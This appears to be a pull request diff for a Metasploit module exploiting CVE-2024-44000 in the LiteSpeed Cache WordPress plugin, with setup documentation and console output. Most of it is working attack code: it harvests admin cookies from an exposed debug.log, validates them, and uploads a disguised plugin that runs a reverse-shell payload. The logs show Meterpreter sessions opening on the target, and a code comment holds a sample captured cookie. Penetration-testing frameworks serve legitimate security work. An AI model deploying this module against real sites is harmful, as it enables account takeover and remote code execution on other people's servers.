### PR TITLE
Add WP Plugin LiteSpeed Cache Account Take Over Module (CVE-2024-44000)

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
+++ b/documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
@@ -27,7 +27,7 @@ services:
       - db
     image: wordpress:latest
     ports:
-      - "8000:80" # You can change the port as per your preference
+      - "8000:80"
     restart: always
     environment:
       WORDPRESS_DB_HOST: db:3306
@@ -59,7 +59,7 @@ Sign out of WordPress and when you reauthenticate your admin cookie will be logg
 ## Scenarios
 ### ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
 ```
-msf6 exploit(multi/http/wp_litespeed_cookie_theft) > rexploit
+msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run
 [*] Reloading module...
 
 [*] Started reverse TCP handler on 192.168.1.67:4444
@@ -85,7 +85,7 @@ Meterpreter : php/linux
 
 ### ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
 ```
-msf6 exploit(multi/http/wp_litespeed_cookie_theft) > rexploit
+msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run
 [*] Reloading module...
 
 [*] Started reverse TCP handler on 192.168.1.67:4444

--- a/documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
+++ b/documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
@@ -1,0 +1,112 @@
+## Vulnerable Application
+This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin that currently
+has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when the Debug Logging
+feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint which is accessible
+without authentication. The Debug Logging feature in the plugin is not enabled by default. The admin cookies
+found in the debug.log can be used to upload and execute a malicious plugin containing a payload.
+
+### Setup
+Spin up a WordPress container with the following docker-compose file:
+```yml
+version: '3.8'
+
+services:
+  db:
+    image: mysql:latest
+    volumes:
+      - db_data:/var/lib/mysql
+    restart: always
+    environment:
+      MYSQL_ROOT_PASSWORD: example_root_password
+      MYSQL_DATABASE: wordpress
+      MYSQL_USER: wordpress_user
+      MYSQL_PASSWORD: example_password
+
+  wordpress:
+    depends_on:
+      - db
+    image: wordpress:latest
+    ports:
+      - "8000:80" # You can change the port as per your preference
+    restart: always
+    environment:
+      WORDPRESS_DB_HOST: db:3306
+      WORDPRESS_DB_USER: wordpress_user
+      WORDPRESS_DB_PASSWORD: example_password
+      WORDPRESS_DB_NAME: wordpress
+    volumes:
+      - wordpress_data:/var/www/html
+
+volumes:
+  db_data:
+  wordpress_data:
+```
+
+Download, install and activate the vulnerable LiteSpeed Cache plugin: https://downloads.wordpress.org/plugin/litespeed-cache.6.3.zip
+Once installed a LiteSpeed menu bar item should appear on the left hand side of the application. When clicked a drop down
+should appear. Select "ToolBox", then select "Debug Settings". Then switch the "Debug Log" feature to "On".
+
+Sign out of WordPress and when you reauthenticate your admin cookie will be logged to /wp-content/debug.log
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use multi/http/wp_litespeed_cookie_theft`
+1. Set the `RHOST`, `LHOST` and `RPORT`
+1. Run the module
+1. Receive a Meterpreter session in the context of the user running the WordPress site.
+
+## Scenarios
+### ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
+```
+msf6 exploit(multi/http/wp_litespeed_cookie_theft) > rexploit
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 192.168.1.67:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] One or more potential admin cookies were found
+[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
+[*] Preparing payload...
+[*] Uploading payload...
+[*] Executing the payload at /wp-content/plugins/qSNzhabMTP/OiDynMUetY.php...
+[*] Sending stage (39927 bytes) to 192.168.1.67
+[+] Deleted OiDynMUetY.php
+[+] Deleted qSNzhabMTP.php
+[+] Deleted ../qSNzhabMTP
+[*] Meterpreter session 7 opened (192.168.1.67:4444 -> 192.168.1.67:64935) at 2024-09-11 23:18:14 -0700
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer    : 29292f368fe3
+OS          : Linux 29292f368fe3 6.10.4-linuxkit #1 SMP PREEMPT_DYNAMIC Mon Aug 12 08:48:58 UTC 2024 x86_64
+Meterpreter : php/linux
+```
+
+### ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
+```
+msf6 exploit(multi/http/wp_litespeed_cookie_theft) > rexploit
+[*] Reloading module...
+
+[*] Started reverse TCP handler on 192.168.1.67:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] One or more potential admin cookies were found
+[+] The target is vulnerable. Found and tested valid admin cookie, we can upload and execute a payload
+[*] Preparing payload...
+[*] Uploading payload...
+[*] Executing the payload at /wp-content/plugins/IVStOPtwuq/WvXecICkgw.php...
+[*] Sending stage (3045380 bytes) to 192.168.1.67
+[+] Deleted WvXecICkgw.php
+[+] Deleted IVStOPtwuq.php
+[+] Deleted ../IVStOPtwuq
+[*] Meterpreter session 6 opened (192.168.1.67:4444 -> 192.168.1.67:64884) at 2024-09-11 23:14:49 -0700
+
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer     : 172.22.0.3
+OS           : Debian 12.5 (Linux 6.10.4-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+```

--- a/documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
+++ b/documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
@@ -60,7 +60,6 @@ Sign out of WordPress and when you reauthenticate your admin cookie will be logg
 ### ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
 ```
 msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run
-[*] Reloading module...
 
 [*] Started reverse TCP handler on 192.168.1.67:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
@@ -86,7 +85,6 @@ Meterpreter : php/linux
 ### ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
 ```
 msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run
-[*] Reloading module...
 
 [*] Started reverse TCP handler on 192.168.1.67:4444
 [*] Running automatic check ("set AutoCheck false" to disable)

--- a/documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
+++ b/documentation/modules/exploit/multi/http/wp_litespeed_cookie_theft.md
@@ -58,6 +58,7 @@ Sign out of WordPress and when you reauthenticate your admin cookie will be logg
 
 ## Scenarios
 ### ARCH_PHP Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
+
 ```
 msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run
 
@@ -83,6 +84,7 @@ Meterpreter : php/linux
 ```
 
 ### ARCH_CMD Target - LiteSpeed Cache 6.3 - WordPress 6.4.3
+
 ```
 msf6 exploit(multi/http/wp_litespeed_cookie_theft) > run
 

--- a/lib/msf/core/exploit/remote/http/wordpress/admin.rb
+++ b/lib/msf/core/exploit/remote/http/wordpress/admin.rb
@@ -42,6 +42,30 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin
     end
   end
 
+
+  # Generate a WordPress plugin containing a Metasploit payload.
+  #
+  # @param plugin_name [String] The name of the plugin
+  # @param payload_name [String] The .php file name
+  # @return [Rex::Zip::Archive] return a valid WordPress plugin in a zip file.
+  def generate_plugin(plugin_name, payload_name)
+    plugin_script = %(<?php
+/**
+ * Plugin Name: #{plugin_name}
+ * Version: #{Faker::App.semantic_version}
+ * Author: #{Faker::Name.name}
+ * Author URI: #{Faker::Internet.url}
+ * License: GPL2
+ */
+?>)
+
+    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file(File.join(plugin_name, "#{plugin_name}.php"), plugin_script)
+    zip.add_file(File.join(plugin_name, "#{payload_name}.php"), php_code)
+    zip
+  end
+
   # Edits a plugin file (relative to plugins dir) using a valid admin session.
   #
   # @param file [String] The plugin file to edit (relative to plugins dir)

--- a/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
+++ b/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
@@ -1,0 +1,161 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+  prepend Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Wordpress LiteSpeed Cache plugin cookie theft',
+        'Description' => %q(
+            Wordpress LiteSpeed Cache plugin cookie theft
+        ),
+        'Author'      =>
+          [
+            '?', # discovery
+            'jheysel-r7'  # module
+          ],
+        'References'  =>
+          [
+            [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],
+            [ 'CVE', '2024-44000']
+          ],
+        'License'        => MSF_LICENSE,
+        'Privileged'     => false,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [['WordPress', {}]],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-09-04',
+        'Notes'           =>
+          {
+            'Stability'   => [ CRASH_SAFE, ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+            'Reliability' => [ REPEATABLE_SESSION, ],
+          },
+        )
+    )
+  end
+
+  def check
+
+    return CheckCode::Unknown unless wordpress_and_online?
+
+    res = send_request_cgi({
+                             'uri' => '/wp-content/debug.log',
+                             'method' => 'GET'
+                           })
+
+    return CheckCode::Unknown('No response from the target') unless res
+    return CheckCode::Safe('There seems to be no debug.log endpoint to pillage') unless res.code == 200
+
+    CheckCode::Vulnerable("Found cookie in debug.log") if res.body.include?("wordpress_logged_in")
+
+  end
+
+  def extract_cookies(debug_log)
+    all_logged_cookies = []
+    debug_log.each_line do |log_line|
+      match = log_line.match(/Cookie: (.*)/)
+      all_logged_cookies << match[0] if match
+    end
+    all_logged_cookies
+  end
+
+  def extract_admin_cookies(all_logged_cookies)
+    admin_cookies = []
+    all_logged_cookies.each do |log_line|
+      match = log_line.match(/(wordpress_logged_in_[^=]+=[^;]+).*(wordpress_[^=]+=[^;]+)|(wordpress_[^=]+=[^;]+).*(wordpress_logged_in_[^=]+=[^;]+)/)
+      admin_cookies << match.captures.compact.join('; ') if match
+    end
+    admin_cookies
+  end
+
+  def verify_admin_cookie(admin_cookies)
+    admin_cookies.each do |admin_cookie|
+      res = send_request_cgi({
+                               'uri' => '/wp-admin/',
+                               'cookie' => admin_cookie
+                             })
+      if res&.code == 200
+        print_good("We've found and admin cookie, time to take over the world.")
+        return admin_cookie
+      else
+        vprint_bad("Not an admin cookie")
+      end
+    end
+  end
+
+  def generate_plugin(plugin_name, payload_name)
+    plugin_script = %Q{<?php
+/**
+ * Plugin Name: #{plugin_name}
+ * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
+ * Author: #{Rex::Text.rand_text_alpha(10)}
+ * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
+ * License: GPL2
+ */
+?>}
+
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
+    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
+    zip
+  end
+
+  def exploit
+
+    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+    res = send_request_cgi({
+                             'uri' => '/wp-content/debug.log',
+                             'method' => 'GET'
+                           })
+    fail_with(Failure::UnexpectedReply,'No response from the target.') unless res
+    fail_with(Failure::UnexpectedReply,'There is no /wp-content/debug.log endpoint on the target to pillage') unless res.code == 200
+    fail_with(Failure::UnexpectedReply,'The debug.log file was found but there are no cookies inside to steal.') unless res.body.include?("wordpress_logged_in")
+
+
+
+    all_cookies = extract_cookies(res.body)
+
+    fail_with(Failure::UnexpectedReply, 'There was an issue extracting cookies from the debug.log file') unless all_cookies
+    print_good("Cookies were found")
+
+    admin_cookies = extract_admin_cookies(all_cookies)
+    vprint_good("One or more potential admin cookies were found")
+
+    admin_cookie = verify_admin_cookie(admin_cookies)
+    vprint_good("Verified we have a valid an admin cookie")
+
+    print_status("Preparing payload...")
+    plugin_name = Rex::Text.rand_text_alpha(10)
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
+    zip = generate_plugin(plugin_name, payload_name)
+
+    print_status("Uploading payload...")
+    # require 'pry-byebug'
+    # binding.pry
+
+    #admin_cookie = "wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726261494%7Cftvy2vH8dTLXjkbZqNg6PU9u7RkI89U1qYfpsvqSPb3%7C8d04a7bea4697a96e4259346dc07654a081597b5484fb91df2a883c72f69f49d; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726261494%7Cftvy2vH8dTLXjkbZqNg6PU9u7RkI89U1qYfpsvqSPb3%7Cb4fb6a316b94520cb51847f71fed25da55d1bcbe8295870dbc6eaa6282654c3b"
+    #admin_cookie = "wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726261494%7Cftvy2vH8dTLXjkbZqNg6PU9u7RkI89U1qYfpsvqSPb3%7C8d04a7bea4697a96e4259346dc07654a081597b5484fb91df2a883c72f69f49d; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726261494%7Cftvy2vH8dTLXjkbZqNg6PU9u7RkI89U1qYfpsvqSPb3%7Cb4fb6a316b94520cb51847f71fed25da55d1bcbe8295870dbc6eaa6282654c3b"
+
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, admin_cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+    print_status("Executing the payload at #{payload_uri}...")
+    register_files_for_cleanup("#{payload_name}.php")
+    register_files_for_cleanup("#{plugin_name}.php")
+    register_dir_for_cleanup("../#{plugin_name}")
+    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
+  end
+end

--- a/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
+++ b/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2024-09-04',
         'Notes' => {
           'Stability' => [ CRASH_SAFE, ],
-          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
           'Reliability' => [ REPEATABLE_SESSION, ]
         }
       )
@@ -101,9 +101,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'uri' => '/wp-admin/',
         'cookie' => admin_cookie
       })
-      if res&.code == 200
-        return admin_cookie
-      end
+      return admin_cookie if res&.code == 200
     end
 
     nil
@@ -113,17 +111,17 @@ class MetasploitModule < Msf::Exploit::Remote
     plugin_script = %(<?php
 /**
  * Plugin Name: #{plugin_name}
- * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
- * Author: #{Rex::Text.rand_text_alpha(10)}
- * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
+ * Version: #{Faker::App.semantic_version}
+ * Author: #{Faker::Name.name}
+ * Author URI: #{Faker::Internet.url}
  * License: GPL2
  */
 ?>)
 
     php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
     zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
-    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
-    zip.add_file("#{plugin_name}/#{payload_name}.php", php_code)
+    zip.add_file(File.join(plugin_name, "#{plugin_name}.php"), plugin_script)
+    zip.add_file(File.join(plugin_name, "#{payload_name}.php"), php_code)
     zip
   end
 
@@ -131,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     raise WordPressNotOnline unless wordpress_and_online?
 
     res = send_request_cgi({
-      'uri' => '/wp-content/debug.log',
+      'uri' => normalize_uri('wp-content', 'debug.log'),
       'method' => 'GET'
     })
     raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200
@@ -155,9 +153,7 @@ class MetasploitModule < Msf::Exploit::Remote
         print_good('Found and tested valid admin cookie, we can upload and execute a payload')
       rescue WordPressNotOnline => e
         fail_with(Failure::NotFound, "#{e.class}, #{e}")
-      rescue DebugLogError => e
-        fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")
-      rescue AdminCookieError => e
+      rescue DebugLogError, AdminCookieError => e
         fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")
       end
     end
@@ -174,8 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
 
     print_status("Executing the payload at #{payload_uri}...")
-    register_files_for_cleanup("#{payload_name}.php")
-    register_files_for_cleanup("#{plugin_name}.php")
+    register_files_for_cleanup("#{payload_name}.php", "#{plugin_name}.php")
     register_dir_for_cleanup("../#{plugin_name}")
     send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })
   end

--- a/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
+++ b/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'License' => MSF_LICENSE,
         'Privileged' => false,
-        'Platform' => 'php linux win',
+        'Platform' => ['unix', 'linux', 'win', 'php'],
         'Arch' => [ARCH_PHP, ARCH_CMD],
         'Targets' => [
           [
@@ -177,6 +177,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_files_for_cleanup("#{payload_name}.php")
     register_files_for_cleanup("#{plugin_name}.php")
     register_dir_for_cleanup("../#{plugin_name}")
-    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
+    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' })
   end
 end

--- a/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
+++ b/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
@@ -89,7 +89,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def extract_cookies(debug_log)
     admin_cookies = []
     debug_log.each_line do |log_line|
-      match = log_line.match(/Cookie:.*(wordpress_logged_in_[^=]+=[^;]+).*(wordpress_[^=]+=[^;]+)|(wordpress_[^=]+=[^;]+).*(wordpress_logged_in_[^=]+=[^;]+)/)
+      # 09/13/24 15:52:48.009 [192.168.65.1:58695 1 UNP] Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7C4084023e82a4c58d574ddf33142b168ff5cb93446675ca8116fd32e1de2b8df7; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1726415372%7C8dXTtGUqH8cjixS1ZU8k58iBmfXRK0xMHXgDZwgjPfn%7Cf6bb4d0fdca7b147f320472893374a063b095b550db3488f86e58b6c47e4ce4c
+      match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)
       admin_cookies << match.captures.compact.join('; ') if match
     end
     admin_cookies
@@ -105,24 +106,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     nil
-  end
-
-  def generate_plugin(plugin_name, payload_name)
-    plugin_script = %(<?php
-/**
- * Plugin Name: #{plugin_name}
- * Version: #{Faker::App.semantic_version}
- * Author: #{Faker::Name.name}
- * Author URI: #{Faker::Internet.url}
- * License: GPL2
- */
-?>)
-
-    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
-    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
-    zip.add_file(File.join(plugin_name, "#{plugin_name}.php"), plugin_script)
-    zip.add_file(File.join(plugin_name, "#{payload_name}.php"), php_code)
-    zip
   end
 
   def get_valid_admin_cookie

--- a/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
+++ b/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def extract_cookies(debug_log)
     admin_cookies = []
     debug_log.each_line do |log_line|
-      match = log_line.match(/Cookie: (wordpress_logged_in_[^=]+=[^;]+).*(wordpress_[^=]+=[^;]+)|(wordpress_[^=]+=[^;]+).*(wordpress_logged_in_[^=]+=[^;]+)/)
+      match = log_line.match(/Cookie:.*(wordpress_logged_in_[^=]+=[^;]+).*(wordpress_[^=]+=[^;]+)|(wordpress_[^=]+=[^;]+).*(wordpress_logged_in_[^=]+=[^;]+)/)
       admin_cookies << match.captures.compact.join('; ') if match
     end
     admin_cookies

--- a/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
+++ b/modules/exploits/multi/http/wp_litespeed_cookie_theft.rb
@@ -9,72 +9,87 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::HTTP::Wordpress
   include Msf::Exploit::FileDropper
-  prepend Exploit::Remote::AutoCheck
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  class DebugLogError < StandardError; end
+  class WordPressNotOnline < StandardError; end
+  class AdminCookieError < StandardError; end
 
   def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'        => 'Wordpress LiteSpeed Cache plugin cookie theft',
-        'Description' => %q(
-            Wordpress LiteSpeed Cache plugin cookie theft
-        ),
-        'Author'      =>
+        'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',
+        'Description' => %q{
+          This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin
+          that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when
+          the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint
+          which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default.
+          The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.
+        },
+        'Author' => [
+          'Rafie Muhammad', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],
+          [ 'CVE', '2024-44000']
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => 'php linux win',
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
           [
-            '?', # discovery
-            'jheysel-r7'  # module
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
           ],
-        'References'  =>
           [
-            [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],
-            [ 'CVE', '2024-44000']
+            'Unix In-Memory',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
           ],
-        'License'        => MSF_LICENSE,
-        'Privileged'     => false,
-        'Platform' => 'php',
-        'Arch' => ARCH_PHP,
-        'Targets' => [['WordPress', {}]],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2024-09-04',
-        'Notes'           =>
-          {
-            'Stability'   => [ CRASH_SAFE, ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, ],
-            'Reliability' => [ REPEATABLE_SESSION, ],
-          },
-        )
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
     )
   end
 
   def check
-
-    return CheckCode::Unknown unless wordpress_and_online?
-
-    res = send_request_cgi({
-                             'uri' => '/wp-content/debug.log',
-                             'method' => 'GET'
-                           })
-
-    return CheckCode::Unknown('No response from the target') unless res
-    return CheckCode::Safe('There seems to be no debug.log endpoint to pillage') unless res.code == 200
-
-    CheckCode::Vulnerable("Found cookie in debug.log") if res.body.include?("wordpress_logged_in")
-
+    @admin_cookie = get_valid_admin_cookie
+    CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')
+  rescue WordPressNotOnline => e
+    return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")
+  rescue DebugLogError => e
+    return CheckCode::Safe("#{e.class}, #{e}")
+  rescue AdminCookieError => e
+    return CheckCode::Safe("#{e.class}, #{e}")
   end
 
   def extract_cookies(debug_log)
-    all_logged_cookies = []
-    debug_log.each_line do |log_line|
-      match = log_line.match(/Cookie: (.*)/)
-      all_logged_cookies << match[0] if match
-    end
-    all_logged_cookies
-  end
-
-  def extract_admin_cookies(all_logged_cookies)
     admin_cookies = []
-    all_logged_cookies.each do |log_line|
-      match = log_line.match(/(wordpress_logged_in_[^=]+=[^;]+).*(wordpress_[^=]+=[^;]+)|(wordpress_[^=]+=[^;]+).*(wordpress_logged_in_[^=]+=[^;]+)/)
+    debug_log.each_line do |log_line|
+      match = log_line.match(/Cookie: (wordpress_logged_in_[^=]+=[^;]+).*(wordpress_[^=]+=[^;]+)|(wordpress_[^=]+=[^;]+).*(wordpress_logged_in_[^=]+=[^;]+)/)
       admin_cookies << match.captures.compact.join('; ') if match
     end
     admin_cookies
@@ -83,20 +98,19 @@ class MetasploitModule < Msf::Exploit::Remote
   def verify_admin_cookie(admin_cookies)
     admin_cookies.each do |admin_cookie|
       res = send_request_cgi({
-                               'uri' => '/wp-admin/',
-                               'cookie' => admin_cookie
-                             })
+        'uri' => '/wp-admin/',
+        'cookie' => admin_cookie
+      })
       if res&.code == 200
-        print_good("We've found and admin cookie, time to take over the world.")
         return admin_cookie
-      else
-        vprint_bad("Not an admin cookie")
       end
     end
+
+    nil
   end
 
   def generate_plugin(plugin_name, payload_name)
-    plugin_script = %Q{<?php
+    plugin_script = %(<?php
 /**
  * Plugin Name: #{plugin_name}
  * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
@@ -104,52 +118,59 @@ class MetasploitModule < Msf::Exploit::Remote
  * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
  * License: GPL2
  */
-?>}
+?>)
 
+    php_code = "<?php #{target['Arch'] == ARCH_PHP ? payload.encoded : "system(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}'));"} ?>"
     zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
     zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
-    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
+    zip.add_file("#{plugin_name}/#{payload_name}.php", php_code)
     zip
   end
 
-  def exploit
+  def get_valid_admin_cookie
+    raise WordPressNotOnline unless wordpress_and_online?
 
-    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
     res = send_request_cgi({
-                             'uri' => '/wp-content/debug.log',
-                             'method' => 'GET'
-                           })
-    fail_with(Failure::UnexpectedReply,'No response from the target.') unless res
-    fail_with(Failure::UnexpectedReply,'There is no /wp-content/debug.log endpoint on the target to pillage') unless res.code == 200
-    fail_with(Failure::UnexpectedReply,'The debug.log file was found but there are no cookies inside to steal.') unless res.body.include?("wordpress_logged_in")
+      'uri' => '/wp-content/debug.log',
+      'method' => 'GET'
+    })
+    raise DebugLogError, 'There was no /wp-content/debug.log endpoint found on the target to pillage' unless res&.code == 200
+    raise DebugLogError, 'There were no cookies found inside /wp-content/debug.log' unless res.body.include?('wordpress_logged_in')
 
+    admin_cookies = extract_cookies(res.body)
+    raise AdminCookieError 'No admin cookies could be found in debug.log' unless admin_cookies
 
-
-    all_cookies = extract_cookies(res.body)
-
-    fail_with(Failure::UnexpectedReply, 'There was an issue extracting cookies from the debug.log file') unless all_cookies
-    print_good("Cookies were found")
-
-    admin_cookies = extract_admin_cookies(all_cookies)
-    vprint_good("One or more potential admin cookies were found")
+    print_status('One or more potential admin cookies were found')
 
     admin_cookie = verify_admin_cookie(admin_cookies)
-    vprint_good("Verified we have a valid an admin cookie")
+    raise AdminCookieError, 'Admin cookies were found but are invalid' unless admin_cookie
 
-    print_status("Preparing payload...")
+    admin_cookie
+  end
+
+  def exploit
+    unless @admin_cookie
+      begin
+        @admin_cookie = get_valid_admin_cookie
+        print_good('Found and tested valid admin cookie, we can upload and execute a payload')
+      rescue WordPressNotOnline => e
+        fail_with(Failure::NotFound, "#{e.class}, #{e}")
+      rescue DebugLogError => e
+        fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")
+      rescue AdminCookieError => e
+        fail_with(Failure::UnexpectedReply, "#{e.class}, #{e}")
+      end
+    end
+
+    print_status('Preparing payload...')
     plugin_name = Rex::Text.rand_text_alpha(10)
-    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
+    payload_name = Rex::Text.rand_text_alpha(10).to_s
     payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
     zip = generate_plugin(plugin_name, payload_name)
 
-    print_status("Uploading payload...")
-    # require 'pry-byebug'
-    # binding.pry
